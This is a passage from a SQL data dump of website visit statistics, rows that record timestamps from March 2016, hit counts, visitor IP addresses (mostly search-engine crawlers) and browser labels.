0,'91.196.178.72','firefox'),(25486,1458822175,1,1,0,0,'217.69.133.236','other'),(25487,1458822176,1,1,0,0,'217.69.133.70','other'),(25488,1458822280,1,1,0,0,'66.249.78.58','other'),(25489,1458822507,1,1,0,0,'46.211.153.165','other'),(25490,1458822587,1,1,0,0,'217.69.143.50','other'),(25491,1458822751,2,2,0,0,'217.69.133.238','other'),(25492,1458823064,2,2,0,0,'213.251.184.38','other'),(25493,1458823081,1,1,0,0,'62.210.143.245','other'),(25494,1458823082,1,1,0,0,'217.69.133.220','other'),(25495,1458823317,1,1,0,0,'66.249.78.51','other'),(25496,1458823319,1,1,0,0,'91.196.178.72','firefox'),(25497,1458823580,1,1,0,0,'178.120.80.28','chrome'),(25498,1458823581,1,1,0,0,'217.69.133.232','other'),(25499,1458823654,2,2,0,0,'66.249.78.58','other'),(25500,1458823662,1,1,0,0,'46.63.89.232','chrome'),(25501,1458823849,2,2,0,0,'178.154.189.204','other'),(25502,1458823853,1,1,0,0,'178.154.189.202','other'),(25503,1458824144,1,1,0,0,'157.55.39.157','other'),(25504,1458824263,1,1,0,0,'130.193.51.81','other'),(25505,1458824265,1,1,0,0,'141.8.142.61','other'),(25506,1458824268,1,1,0,0,'141.8.142.62','other'),(25507,1458824270,1,1,0,0,'5.255.253.10','other'),(25508,1458824273,1,1,0,0,'178.154.149.11','other'),(25509,1458824275,1,1,0,0,'5.255.253.67','other'),(25510,1458824278,1,1,0,0,'93.158.152.9','other'),(25511,1458824281,1,1,0,0,'141.8.132.101','other'),(25512,1458824284,1,1,0,0,'141.8.183.14','other'),(25513,1458824287,1,1,0,0,'141.8.132.97','other'),(25514,1458824395,1,1,0,0,'88.198.230.79','other'),(25515,1458824419,2,2,0,0,'66.249.78.51','other'),(25516,1458824628,1,1,0,0,'40.77.167.71','other'),(25517,1458824645,1,1,0,0,'217.69.133.67','other'),(25518,1458825127,1,1,0,0,'91.196.178.67','chrome'),(25519,1458825774,1,1,0,0,'213.5.193.1','chrome'),(25520,1458825996,1,1,0,0,'66.249.66.44','other'),(25521,1458826076,1,1,0,0,'91.196.178.69','firefox'),(25522,1458826121,1,1,0,0,'66.249.78.51','other'),(25523,1458826175,1,1,0,0,'217.69.133.69','other'),(25524,1458826287,3,3,0,0,'66.249.78.65','other'),(25525,1458826293,1,1,0,0,'217.69.133.223','other'),(25526,1458826505,1,1,0,0,'66.249.92.43','other'),(25527,1458827034,1,1,0,0,'217.69.133.68','other'),(25528,1458827543,3,1,2,0,'66.249.78.58',''),(25529,1458827663,1,1,0,0,'217.69.143.61','other'),(25530,1458827710,1,1,0,0,'91.196.178.162','chrome'),(25531,1458827806,1,1,0,0,'80.93.124.83','firefox'),(25532,1458827840,1,1,0,0,'178.92.8.252','chrome'),(25533,1458827897,2,2,0,0,'66.249.78.51','other'),(25534,1458827927,1,1,0,0,'91.196.178.66','firefox'),(25535,1458828105,1,1,0,0,'52.50.157.83','other'),(25536,1458828253,1,1,0,0,'91.196.178.135','firefox'),(25537,1458828778,1,1,0,0,'37.53.242.221','chrome'),(25538,1458829244,4,1,3,0,'66.249.78.58',''),(25539,1458829515,1,1,0,0,'91.196.178.69','chrome'),(25540,1458829540,2,2,0,0,'95.213.141.126','opera'),(25541,1458829608,1,0,1,0,'66.249.78.65',''),(25542,1458829676,3,0,3,0,'66.249.78.51',''),(25543,1458830264,1,1,0,0,'178.92.69.71','firefox'),(25544,1458830266,1,1,0,0,'217.69.133.219','other'),(25545,1458830294,1,1,0,0,'178.154.189.203','other'),(25546,1458830298,3,3,0,0,'178.154.189.202','other'),(25547,1458830314,2,1,1,0,'66.249.78.65',''),(25548,1458830544,2,2,0,0,'91.196.178.72','firefox'),(25549,1458830646,1,1,0,0,'217.69.133.224','other'),(25550,1458830980,1,1,0,0,'217.69.143.50','other'),(25551,1458830986,1,1,0,0,'195.69.222.116','chrome'),(25552,1458831049,1,1,0,0,'5.255.253.10','other'),(25553,1458831203,1,1,0,0,'66.249.78.65','other'),(25554,1458831311,1,1,0,0,'37.55.226.220','chrome'),(25555,1458831431,1,1,0,0,'141.0.15.237','other'),(25556,1458831556,1,1,0,0,'37.52.23.53','chrome'),(25557,1458832282,4,4,0,0,'46.4.120.3','other'),(25558,1458832576,4,4,0,0,'144.76.4.148','other'),(25559,1458832664,1,1,0,0,'91.196.178.39','firefox'),(25560,1458832730,1,1,0,0,'95.134.40.248','chrome'),(25561,1458832738,1,1,0,0,'65.19.138.33','other'),(25562,1458832807,7,0,7,0,'66.249.78.51',''),(25563,1458832851,4,0,4,0,'66.249.78.58',''),(25564,1458833038,2,2,0,0,'178.154.189.202','other'),(25565,1458833046,1,1,0,0,'178.154.189.203','other'),(25566,1458833069,1,1,0,0,'217.69.143.46','other'),(25567,1458833115,1,1,0,0,'66.249.66.50','other'),(25568,1458833205,1,1,0,0,'217.69.133.225','other'),(25569,1458833536,1,1,0,0,'62.210.215.100','chrome'),(25571,1458833689,1,1,0,0,'180.76.15.158','other'),(25572,1458833698,1,1,0,0,'217.69.133.235','other'),(25573,1458833769,1,0,1,0,'66.249.78.65',''),(25574,1458834113,1,1,0,0,'66.249.78.65','other'),(25575,1458834255,1,1,0,0,'217.69.133.217','other'),(25576,1458834266,1,1,0,0,'178.94.172.238','chrome'),(25577,1458834627,1,1,0,0,'217.69.133.223','other'),(25578,1458834680,1,1,0,0,'217.69.133.237','other'),(25579,1458834790,1,1,0,0,'95.134.41.128','chrome'),(25580,1458834964,1,1,0,0,'217.69.133.230','other'),(25581,1458835374,1,1,0,0,'217.69.143.50','other'),(25582,1458835436,1,1,0,0,'178.150.117.250','chrome'),(25583,1458835490,1,1,0,0,'188.40.95.70','other'),(25584,1458835739,1,0,1,0,'66.249.78.51',''),(25585,1458835887,1,1,0,0,'91.196.178.167','chrome'),(25586,1458836275,1,0,1,0,'66.249.78.106',''),(25587,1458836277,1,1,0,0,'157.55.39.173','other'),(25588,1458836414,1,1,0,0,'176.77.1.235','chrome'),(25589,1458836415,1,1,0,0,'95.27.89.91','chrome'),(25592,1458836416,1,1,0,0,'128.68.245.59','chrome'),(25593,1458836483,3,1,2,0,'66.249.78.51',''),(25594,1458836590,1,1,0,0,'95.135.90.147','firefox'),(25595,1458836708,1,0,1,0,'66.249.78.65',''),(25596,1458836745,1,1,0,0,'66.249.92.46','other'),(25597,1458836835,1,1,0,0,'66.249.78.58','other'),(25598,1458837002,10,1,9,0,'66.249.78.51',''),(25599,1458837025,1,0,1,0,'66.249.66.47',''),(25600,1458837077,1,0,1,0,'66.249.78.99',''),(25601,1458837299,1,1,0,0,'217.69.143.66','other'),(25602,1458837734,1,1,0,0,'93.158.152.9','other'),(25603,1458837737,1,1,0,0,'130.193.51.43','other'),(25604,1458837739,1,1,0,0,'141.8.132.41','other'),(25605,1458837742,1,1,0,0,'93.158.152.26','other'),(25606,1458837748,1,1,0,0,'95.135.90.147','firefox'),(25607,1458837783,1,1,0,0,'217.69.133.222','other'),(25608,1458838057,1,1,0,0,'217.69.133.234','other'),(25609,1458838242,1,1,0,0,'217.69.133.229','other'),(25610,1458838479,1,0,1,0,'66.249.78.51',''),(25611,1458838611,1,1,0,0,'217.69.143.63','other'),(25612,1458838836,1,1,0,0,'217.69.133.67','other'),(25613,1458839108,1,1,0,0,'95.135.90.147','firefox'),(25614,1458839190,1,1,0,0,'94.179.109.154','firefox'),(25615,1458839366,1,1,0,0,'217.69.133.231','other'),(25616,1458839368,1,1,0,0,'217.69.133.228','other'),(25617,1458839711,1,1,0,0,'217.69.133.69','other'),(25618,1458839716,1,1,0,0,'217.69.133.240','other'),(25619,1458840055,1,1,0,0,'157.55.39.93','other'),(25620,1458840068,2,2,0,0,'40.77.167.37','other'),(25621,1458840196,1,1,0,0,'217.69.133.67','other'),(25622,1458840235,1,1,0,0,'178.92.171.89','chrome'),(25623,1458840488,1,1,0,0,'217.69.133.227','other'),(25624,1458840556,1,1,0,0,'157.55.39.233','other'),(25625,1458840632,1,1,0,0,'141.8.132.41','other'),(25626,1458840682,1,0,1,0,'66.249.66.44',''),(25627,1458840718,1,1,0,0,'217.69.133.250','other'),(25628,1458840759,1,0,1,0,'66.249.78.106',''),(25629,1458840951,1,0,1,0,'66.249.78.51',''),(25630,1458840962,1,0,1,0,'66.249.78.65',''),(25631,1458841240,2,2,0,0,'40.77.167.37','other'),(25632,1458841278,1,1,0,0,'66.249.78.65','other'),(25633,1458841382,1,1,0,0,'217.69.133.216','other'),(25634,1458841706,1,1,0,0,'91.196.178.37','opera'),(25635,1458841820,1,1,0,0,'216.163.188.232','firefox'),(25636,1458841946,2,2,0,0,'217.69.133.229','other'),(25637,1458842065,2,2,0,0,'62.210.215.100','chrome'),(25638,1458842252,2,2,0,0,'66.249.78.51','other'),(25639,1458842328,1,1,0,0,'217.69.133.85','other'),(25640,1458842348,1,1,0,0,'66.249.78.58','other'),(25641,1458842361,1,1,0,0,'66.249.66.47','other'),(25642,1458842741,2,2,0,0,'85.14.245.175','other'),(25643,1458842743,1,1,0,0,'85.14.244.114','other'),(25644,1458842745,2,2,0,0,'193.111.140.153','other'),(25645,1458843118,3,3,0,0,'178.154.189.202','other'),(25646,1458843385,2,1,1,0,'66.249.78.58',''),(25647,1458843559,1,0,1,0,'66.249.78.99',''),(25648,1458843564,1,1,0,0,'8.29.198.25','other'),(25649,1458843725,1,1,0,0,'66.249.66.50','other'),(25650,1458844150,1,1,0,0,'217.69.133.226','other'),(25651,1458844233,1,1,0,0,'180.76.15.17','other'),(25652,1458844624,2,0,2,0,'66.249.78.65',''),(25653,1458844701,1,1,0,0,'157.55.39.233','other'),(25654,1458844770,1,1,0,0,'217.69.133.219','other'),(25655,1458844798,1,0,1,0,'66.249.66.50',''),(25656,1458844992,1,1,0,0,'217.69.133.239','other'),(25657,1458845315,2,0,2,0,'66.249.66.44',''),(25658,1458845912,1,1,0,0,'66.102.9.68','chrome'),(25659,1458846331,1,1,0,0,'217.69.133.227','other'),(25660,1458846537,1,1,0,0,'157.55.39.93','other'),(25661,1458846755,5,5,0,0,'144.76.93.46','other'),(25662,1458846831,1,1,0,0,'66.249.66.47','other'),(25663,1458847077,1,1,0,0,'141.8.183.25','other'),(25664,1458847121,1,1,0,0,'193.194.127.217','firefox'),(25665,1458847777,2,2,0,0,'141.8.142.61','other'),(25666,1458847828,1,1,0,0,'217.69.133.84','other'),(25667,1458847944,1,1,0,0,'66.249.78.99','other'),(25668,1458848091,1,1,0,0,'130.193.50.6','other'),(25669,1458848095,1,1,0,0,'141.8.132.10','other'),(25670,1458848104,2,2,0,0,'141.8.183.25','other'),(25671,1458848132,1,1,0,0,'141.8.132.105','other'),(25672,1458848136,1,1,0,0,'130.193.50.34','other'),(25673,1458848145,1,1,0,0,'66.249.92.49','other'),(25674,1458848225,1,1,0,0,'40.77.167.37','other'),(25675,1458848665,1,1,0,0,'217.69.133.225','other'),(25676,1458848736,1,1,0,0,'130.193.51.83','other'),(25677,1458849271,2,2,0,0,'141.8.142.67','other'),(25678,1458849274,1,1,0,0,'141.8.132.105','other'),(25679,1458849278,1,1,0,0,'141.8.183.25','other'),(25680,1458849334,2,0,2,0,'66.249.66.44',''),(25681,1458849523,1,1,0,0,'66.249.78.58','other'),(25682,1458849539,1,1,0,0,'95.132.141.192','chrome'),(25683,1458849609,1,0,1,0,'66.249.78.51',''),(25684,1458849871,1,1,0,0,'217.69.133.69','other'),(25685,1458849948,1,1,0,0,'180.76.15.28','other'),(25686,1458850056,1,1,0,0,'178.154.189.202','other'),(25687,1458850087,1,1,0,0,'130.193.50.4','other'),(25688,1458850264,1,1,0,0,'217.69.133.67','other'),(25689,1458850638,1,1,0,0,'5.255.253.26','other'),(25690,1458850642,1,1,0,0,'40.77.167.37','other'),(25691,1458850706,1,1,0,0,'66.249.66.50','other'),(25692,1458850733,7,7,0,0,'66.249.78.51','other'),(25693,1458850751,1,1,0,0,'66.249.66.44','other'),(25694,1458850830,1,1,0,0,'217.69.133.240','other'),(25695,1458851013,2,2,0,0,'66.249.78.65','other'),(25696,1458851096,2,1,1,0,'66.249.78.58',''),(25697,1458851496,1,1,0,0,'141.8.184.22','other'),(25698,1458851710,1,1,0,0,'217.69.133.68','other'),(25699,1458851956,1,1,0,0,'180.76.15.32','other'),(25700,1458852127,1,1,0,0,'5.255.253.53','other'),(25701,1458852131,1,1,0,0,'5.255.253.100','other'),(25702,1458852136,1,1,0,0,'5.255.253.36','other'),(25703,1458852169,1,1,0,0,'157.55.39.93','other'),(25704,1458852238,1,0,1,0,'66.249.78.65',''),(25705,1458852485,1,0,1,0,'66.249.78.58',''),(25706,1458852555,1,1,0,0,'217.69.133.218','other'),(25707,1458852706,1,1,0,0,'130.193.51.45','other'),(25708,1458852801,1,1,0,0,'62.210.215.100','chrome'),(25709,1458853296,1,1,0,0,'66.249.78.58','other'),(25710,1458853306,10,10,0,0,'66.249.78.51','other'),(25711,1458853328,1,1,0,0,'5.255.253.53','other'),(25712,1458853358,4,4,0,0,'66.249.66.44','other'),(25713,1458853690,1,1,0,0,'217.69.133.215','other'),(25714,1458853844,1,1,0,0,'5.255.253.67','other'),(25715,1458853959,1,1,0,0,'217.69.133.233','other'),(25716,1458854149,1,1,0,0,'217.69.143.64','other'),(25718,1458854374,2,2,0,0,'66.249.78.58','other'),(25719,1458854430,1,1,0,0,'130.193.51.43','other'),(25720,1458854434,1,1,0,0,'8.29.198.26','other'),(25721,1458854655,1,0,1,0,'66.249.78.65',''),(25722,1458854820,1,1,0,0,'194.116.244.2','firefox'),(25723,1458855030,1,1,0,0,'130.193.51.14','other'),(25724,1458855219,1,0,1,0,'66.249.78.51',''),(25725,1458855645,1,1,0,0,'217.69.133.229','other'),(25726,1458855741,1,1,0,0,'5.255.253.10','other'),(25727,1458855745,1,1,0,0,'5.255.253.67','other'),(25728,1458855749,1,1,0,0,'141.8.142.25','other'),(25729,1458855753,1,1,0,0,'141.8.132.83','other'),(25730,1458855798,1,1,0,0,'217.69.133.67','other'),(25731,1458855882,1,0,1,0,'66.249.78.58',''),(25732,1458855903,1,1,0,0,'66.249.66.47','other'),(25733,1458855971,1,1,0,0,'93.158.152.46','other'),(25734,1458856238,1,1,0,0,'217.69.143.69','other'),(25735,1458856401,2,0,2,0,'66.249.78.51',''),(25736,1458856418,3,2,1,0,'66.249.78.99',''),(25737,1458856426,1,0,1,0,'66.249.66.44',''),(25738,1458856466,1,1,0,0,'66.249.78.113','other'),(25739,1458856600,1,1,0,0,'141.8.132.99','other'),(25740,1458856604,1,1,0,0,'93.158.152.26','other'),(25741,1458856609,1,1,0,0,'93.158.152.9','other'),(25742,1458856668,2,0,2,0,'66.249.78.65',''),(25743,1458856951,1,1,0,0,'217.69.133.238','other'),(25744,1458857033,1,0,1,0,'66.249.78.58',''),(25745,1458857159,1,1,0,0,'66.249.78.99','other'),(25746,1458857337,1,1,0,0,'130.193.51.79','other'),(25747,1458857341,1,1,0,0,'130.193.50.32','other'),(25748,1458857345,1,1,0,0,'141.8.142.78','other'),(25749,1458857349,1,1,0,0,'141.8.132.52','other'),(25750,1458857553,1,1,0,0,'31.41.48.2','firefox'),(25751,1458858029,1,1,0,0,'5.255.253.26','other'),(25752,1458858114,7,1,6,0,'66.249.78.51',''),(25753,1458858783,2,0,2,0,'66.249.78.65',''),(25754,1458858824,1,1,0,0,'178.154.189.37','other'),(25755,1458858955,1,1,0,0,'66.249.92.43','other'),(25756,1458859041,1,1,0,0,'217.69.133.217','other'),(25757,1458859254,1,1,0,0,'217.69.143.50','other'),(25758,1458859636,1,1,0,0,'130.193.51.45','other'),(25759,1458859640,1,1,0,0,'141.8.142.85','other'),(25760,1458859644,1,1,0,0,'93.158.152.46','other'),(25761,1458859648,1,1,0,0,'141.8.183.19','other'),(25762,1458859766,2,0,2,0,'66.249.66.47',''),(25763,1458859948,3,3,0,0,'130.193.51.74','other'),(25764,1458860199,2,1,1,0,'66.249.78.58',''),(25765,1458860247,1,1,0,0,'66.249.78.51','other'),(25766,1458860487,2,2,0,0,'141.8.132.30','other'),(25767,1458860490,1,1,0,0,'93.158.152.9','other'),(25768,1458860706,1,1,0,0,'141.8.183.14','other'),(25769,1458860769,1,1,0,0,'141.8.142.78','other'),(25770,1458860917,1,1,0,0,'93.158.152.26','other'),(25771,1458860985,2,2,0,0,'5.255.253.47','other'),(25772,1458861060,2,2,0,0,'5.255.253.100','other'),(25773,1458861064,2,2,0,0,'130.193.51.43','other'),(25774,1458861068,1,1,0,0,'141.8.142.85','other'),(25775,1458861092,1,1,0,0,'130.193.50.32','other'),(25776,1458861099,1,1,0,0,'217.69.133.220','other'),(25777,1458861199,1,1,0,0,'5.255.253.53','other'),(25778,1458861243,1,1,0,0,'207.46.13.168','other'),(25779,1458861334,1,1,0,0,'130.193.51.79','other'),(25780,1458861338,2,2,0,0,'93.158.152.51','other'),(25781,1458861343,1,1,0,0,'178.154.189.37','other'),(25782,1458861377,1,1,0,0,'141.8.184.11','other'),(25783,1458861381,1,1,0,0,'141.8.132.2','other'),(25784,1458861389,1,1,0,0,'141.8.142.62','other'),(25785,1458861397,1,1,0,0,'130.193.51.74','other'),(25786,1458861401,1,1,0,0,'141.8.132.30','other'),(25787,1458861535,1,1,0,0,'217.69.133.9','other'),(25788,1458861682,1,1,0,0,'217.69.133.69','other'),(25789,1458861694,1,1,0,0,'93.158.152.9','other'),(25790,1458861713,1,1,0,0,'217.69.133.240','other'),(25791,1458862065,1,1,0,0,'217.69.143.51','other'),(25792,1458862223,1,1,0,0,'62.210.215.100','chrome'),(25793,1458862283,2,2,0,0,'130.193.51.79','other'),(25794,1458862948,1,1,0,0,'130.193.50.4','other'),(25795,1458863158,1,1,0,0,'141.8.132.30','other'),(25796,1458863163,1,1,0,0,'141.8.132.83','other'),(25797,1458863209,1,0,1,0,'66.249.78.65',''),(25798,1458863381,1,1,0,0,'180.76.15.34','other'),(25799,1458863505,1,1,0,0,'217.69.133.68','other'),(25800,1458863519,1,0,1,0,'66.249.78.106',''),(25801,1458863621,1,1,0,0,'207.46.13.101','other'),(25802,1458863644,1,1,0,0,'217.69.143.42','other'),(25803,1458863867,1,1,0,0,'93.158.152.46','other'),(25804,1458863870,1,1,0,0,'130.193.50.6','other'),(25805,1458863873,2,2,0,0,'141.8.132.99','other'),(25806,1458863876,1,1,0,0,'178.154.189.37','other'),(25807,1458864368,1,1,0,0,'130.193.51.74','other'),(25808,1458864542,2,0,2,0,'66.249.78.51',''),(25809,1458864558,1,1,0,0,'217.69.143.60','other'),(25810,1458864764,1,1,0,0,'66.249.78.65','other'),(25811,1458864855,1,1,0,0,'5.255.253.53','other'),(25812,1458865382,1,1,0,0,'8.29.198.25','other'),(25813,1458865554,1,1,0,0,'217.69.133.85','other'),(25814,1458865664,1,1,0,0,'130.193.50.4','other'),(25815,1458865667,1,1,0,0,'178.154.149.11','other'),(25816,1458865670,1,1,0,0,'141.8.183.14','other'),(25817,1458866022,1,1,0,0,'217.69.133.84','other'),(25818,1458866038,1,0,1,0,'66.249.78.65',''),(25819,1458866071,1,0,1,0,'66.249.78.58',''),(25820,1458866330,300,300,0,0,'149.202.48.176','other'),(25821,1458866482,1,1,0,0,'141.8.132.2','other'),(25822,1458866492,1,1,0,0,'93.158.152.51','other'),(25823,1458866498,1,1,0,0,'5.255.253.26','other'),(25824,1458866655,2,1,1,0,'66.249.78.65',''),(25825,1458867159,1,0,1,0,'66.249.78.51',''),(25826,1458867168,1,1,0,0,'141.8.183.14','other'),(25827,1458867612,1,1,0,0,'217.69.143.63','other'),(25828,1458867935,1,1,0,0,'217.69.133.220','other'),(25829,1458868043,1,1,0,0,'141.8.132.99','other'),(25830,1458868316,1,1,0,0,'207.46.13.168','other'),(25831,1458868458,2,0,2,0,'66.249.78.58',''),(25832,1458868585,1,1,0,0,'217.69.143.66','other'),(25833,1458868846,1,1,0,0,'141.8.142.62','other'),(25834,1458868994,1,1,0,0,'217.69.143.55','other'),(25835,1458868995,1,1,0,0,'217.69.143.60','other'),(25836,1458869177,1,1,0,0,'217.69.133.69','other'),(25837,1458869264,1,1,0,0,'66.249.66.50','other'),(25838,1458869434,1,1,0,0,'130.193.51.43','other'),(25839,1458869821,2,2,0,0,'141.8.184.11','other'),(25840,1458869844,1,1,0,0,'141.8.142.78','other'),(25841,1458869847,2,2,0,0,'130.193.51.74','other'),(25842,1458869850,1,1,0,0,'141.8.183.25','other'),(25843,1458869853,1,1,0,0,'141.8.142.62','other'),(25844,1458869910,1,1,0,0,'217.69.133.225','other'),(25845,1458869911,1,1,0,0,'217.69.133.226','other'),(25846,1458869985,1,1,0,0,'5.255.253.10','other'),(25847,1458869998,2,2,0,0,'141.8.142.67','other'),(25848,1458870001,1,1,0,0,'141.8.142.10','other'),(25849,1458870020,2,2,0,0,'130.193.50.4','other'),(25850,1458870031,3,3,0,0,'93.158.152.26','other'),(25851,1458870035,1,1,0,0,'66.249.92.43','other'),(25853,1458870161,2,2,0,0,'130.193.51.45','other'),(25854,1458870172,1,1,0,0,'130.193.37.21','other'),(25855,1458870185,1,1,0,0,'93.158.152.46','other'),(25856,1458870640,1,1,0,0,'217.69.143.50','other'),(25857,1458870729,2,2,0,0,'93.158.152.75','other'),(25858,1458870733,2,2,0,0,'130.193.51.43','other'),(25859,1458870741,1,1,0,0,'5.255.253.53','other'),(25860,1458870746,1,1,0,0,'5.255.253.67','other'),(25861,1458870750,1,1,0,0,'5.255.253.26','other'),(25862,1458870762,1,1,0,0,'141.8.183.14','other'),(25863,1458870770,1,1,0,0,'5.255.253.36','other'),(25864,1458870775,1,1,0,0,'141.8.184.11','other'),(25865,1458870884,1,0,1,0,'66.249.78.51',''),(25866,1458871198,1,0,1,0,'66.249.78.58',''),(25867,1458871530,199,199,0,0,'89.163.148.58','other'),(25868,1458872128,1,1,0,0,'217.69.133.219','other'),(25869,1458872180,2,0,2,0,'66.249.78.51',''),(25870,1458872658,1,1,0,0,'217.69.143.52','other'),(25871,1458872660,1,0,1,0,'66.249.78.65',''),(25872,1458872837,3,0,3,0,'66.249.78.58',''),(25873,1458873037,1,1,0,0,'207.46.13.101','other'),(25874,1458873173,1,1,0,0,'182.118.20.163','msie'),(25875,1458873222,1,1,0,0,'217.69.143.69','other'),(25876,1458874004,2,0,2,0,'66.249.78.65',''),(25877,1458874265,1,1,0,0,'207.46.13.101','other'),(25878,1458874363,2,0,2,0,'66.249.78.58',''),(25879,1458874423,1,1,0,0,'217.69.133.215','other'),(25880,1458874526,1,1,0,0,'62.210.215.100','chrome'),(25881,1458874662,1,1,0,0,'217.69.143.61','other'),(25882,1458874741,2,0,2,0,'66.249.78.51',''),(25883,1458874806,1,1,0,0,'66.249.78.51','other'),(25884,1458875243,1,1,0,0,'217.69.133.226','other'),(25885,1458875244,1,1,0,0,'217.69.133.223','other'),(25886,1458875306,1,1,0,0,'207.46.13.168','other'),(25887,1458875309,1,0,1,0,'66.249.78.58',''),(25888,1458875457,1,1,0,0,'207.46.13.101','other'),(25889,1458875664,1,1,0,0,'66.249.78.58','other'),(25890,1458875833,1,1,0,0,'217.69.133.233','other'),(25891,1458876068,1,1,0,0,'130.193.37.21','other'),(25892,1458876072,1,1,0,0,'178.154.149.11','other'),(25893,1458876221,1,1,0,0,'8.29.198.26','other'),(25894,1458876616,1,1,0,0,'217.69.133.224','other'),(25895,1458877007,2,0,2,0,'66.249.78.65',''),(25896,1458877067,1,1,0,0,'207.46.13.101','other'),(25897,1458877823,1,1,0,0,'66.249.78.113','other'),(25898,1458878044,1,1,0,0,'217.69.133.228','other'),(25899,1458878076,1,0,1,0,'66.249.78.65',''),(25900,1458878136,1,0,1,0,'40.77.167.37',''),(25901,1458878243,1,0,1,0,'66.249.78.58',''),(25902,1458878467,2,0,2,0,'66.249.78.51',''),(25903,1458878613,2,2,0,0,'85.101.12.22','opera'),(25904,1458878859,1,1,0,0,'217.69.143.63','other'),(25905,1458879194,1,1,0,0,'141.0.15.163','other'),(25906,1458879203,1,1,0,0,'66.249.66.44','other'),(25907,1458879207,1,1,0,0,'217.69.133.233','other'),(25908,1458879838,3,0,3,0,'66.249.78.65',''),(25909,1458880380,1,1,0,0,'217.69.133.217','other'),(25910,1458880486,1,1,0,0,'66.249.92.49','other'),(25911,1458880878,1,0,1,0,'66.249.78.51',''),(25912,1458881322,1,1,0,0,'217.69.133.224','other'),(25913,1458881434,1,1,0,0,'141.8.142.78','other'),(25914,1458882231,1,0,1,0,'66.249.66.47',''),(25915,1458882435,2,2,0,0,'217.69.133.222','other'),(25916,1458882799,2,1,1,0,'66.249.78.65',''),(25917,1458882896,1,1,0,0,'141.8.132.30','other'),(25918,1458882900,1,1,0,0,'141.8.132.10','other'),(25919,1458882905,1,1,0,0,'5.255.253.113','other'),(25920,1458883074,11,0,11,0,'66.249.78.51',''),(25921,1458883170,1,0,1,0,'66.249.78.99',''),(25922,1458883183,1,0,1,0,'66.249.66.44',''),(25923,1458883198,1,1,0,0,'217.69.133.229','other'),(25924,1458883646,1,1,0,0,'141.8.142.62','other'),(25925,1458883647,1,1,0,0,'5.255.253.47','other'),(25926,1458883915,1,1,0,0,'217.69.143.56','other'),(25927,1458883963,1,1,0,0,'217.69.133.84','other'),(25928,1458884273,1,1,0,0,'141.8.142.67','other'),(25929,1458884288,1,1,0,0,'207.46.13.101','other'),(25930,1458884511,1,1,0,0,'217.69.143.67','other'),(25931,1458884512,1,1,0,0,'217.69.143.65','other'),(25932,1458884621,1,0,1,0,'66.249.78.58',''),(25933,1458884787,1,1,0,0,'62.210.215.100','chrome'),(25934,1458884983,1,0,1,0,'66.249.66.50',''),(25935,1458884993,1,1,0,0,'141.8.183.25','other'),(25936,1458884994,1,1,0,0,'5.255.253.113','other'),(25937,1458885076,1,1,0,0,'217.69.133.69','other'),(25938,1458885481,1,1,0,0,'66.249.78.99','other'),(25939,1458885509,1,1,0,0,'66.249.78.106','other'),(25940,1458885533,1,1,0,0,'66.249.78.58','other'),(25941,1458885558,1,1,0,0,'66.249.78.51','other'),(25942,1458885578,1,0,1,0,'66.249.66.74',''),(25943,1458885664,1,1,0,0,'130.193.50.34','other'),(25944,1458885695,1,1,0,0,'217.69.133.226','other'),(25945,1458885764,1,1,0,0,'217.69.133.6','other'),(25946,1458886234,1,1,0,0,'217.69.133.218','other'),(25947,1458886492,1,0,1,0,'66.249.78.58',''),(25948,1458886516,4,0,4,0,'66.249.78.51',''),(25949,1458886530,1,1,0,0,'141.8.142.85','other'),(25950,1458886531,1,1,0,0,'141.8.132.83','other'),(25951,1458886532,1,1,0,0,'93.158.152.51','other'),(25952,1458886533,1,1,0,0,'141.8.142.62','other'),(25953,1458886581,1,1,0,0,'91.196.178.72','firefox'),(25954,1458886600,1,0,1,0,'66.249.78.65',''),(25955,1458886617,1,0,1,0,'66.249.66.44',''),(25956,1458886898,1,1,0,0,'178.154.189.37','other'),(25957,1458887021,1,1,0,0,'91.196.177.44','chrome'),(25958,1458887060,1,1,0,0,'207.46.13.168','other'),(25959,1458887066,1,1,0,0,'207.46.13.53','other'),(25960,1458887080,1,1,0,0,'5.255.253.36','other'),(25961,1458887088,1,1,0,0,'8.29.198.26','other'),(25962,1458887137,1,0,1,0,'66.249.78.99',''),(25963,1458887264,1,1,0,0,'91.196.179.69','firefox'),(25964,1458887455,1,1,0,0,'217.69.133.216','other'),(25965,1458887456,1,1,0,0,'217.69.133.217','other'),(25966,1458887746,1,1,0,0,'141.8.142.78','other'),(25968,1458887889,1,1,0,0,'217.69.133.231','other'),(25969,1458887939,1,1,0,0,'91.196.177.44','chrome'),(25970,1458888278,2,1,1,0,'66.249.78.58',''),(25971,1458888417,1,1,0,0,'66.249.66.44','other'),(25972,1458888474,1,1,0,0,'62.210.215.100','chrome'),(25973,1458888524,1,1,0,0,'89.34.164.119','chrome'),(25974,1458888560,1,1,0,0,'141.8.132.83','other'),(25975,1458888706,1,1,0,0,'141.8.132.30','other'),(25976,1458888760,1,1,0,0,'91.196.178.67','firefox'),(25977,1458889089,1,1,0,0,'37.53.87.113','chrome'),(25978,1458889127,1,1,0,0,'130.193.51.81','other'),(25979,1458889131,1,1,0,0,'5.255.253.36','other'),(25980,1458889135,1,1,0,0,'5.255.253.9','other'),(25981,1458889282,1,0,1,0,'66.249.66.50',''),(25982,1458889417,1,0,1,0,'66.249.78.113',''),(25983,1458889426,1,1,0,0,'66.249.78.65','other'),(25984,1458889454,1,1,0,0,'217.69.133.239','other'),(25985,1458889543,1,1,0,0,'93.158.152.75','other'),(25986,1458889555,1,1,0,0,'40.77.167.37','other'),(25987,1458890031,1,1,0,0,'217.69.133.223','other'),(25988,1458890172,1,1,0,0,'91.196.179.69','firefox'),(25989,1458890280,1,1,0,0,'5.255.253.9','other'),(25990,1458890329,1,1,0,0,'66.249.66.77','other'),(25991,1458890338,1,1,0,0,'66.249.93.100','chrome'),(25992,1458890373,1,1,0,0,'78.111.185.180','firefox'),(25993,1458890414,1,0,1,0,'66.249.66.74',''),(25994,1458890661,1,1,0,0,'217.69.133.219','other'),(25995,1458890665,2,2,0,0,'85.90.212.8','firefox'),(25996,1458890697,1,1,0,0,'66.249.66.50','other'),(25997,1458890879,1,0,1,0,'66.249.78.58',''),(25998,1458891030,1,0,1,0,'66.249.78.51',''),(25999,1458891205,1,1,0,0,'66.249.78.65','other'),(26000,1458891368,1,1,0,0,'93.158.152.46','other'),(26001,1458891425,1,1,0,0,'66.249.92.43','other'),(26002,1458891533,2,2,0,0,'207.46.13.101','other'),(26003,1458892011,1,1,0,0,'217.69.143.50','other'),(26004,1458892481,1,1,0,0,'141.8.142.10','other'),(26005,1458892583,1,1,0,0,'91.196.178.132','firefox'),(26006,1458892807,1,1,0,0,'217.69.143.56','other'),(26007,1458893015,1,0,1,0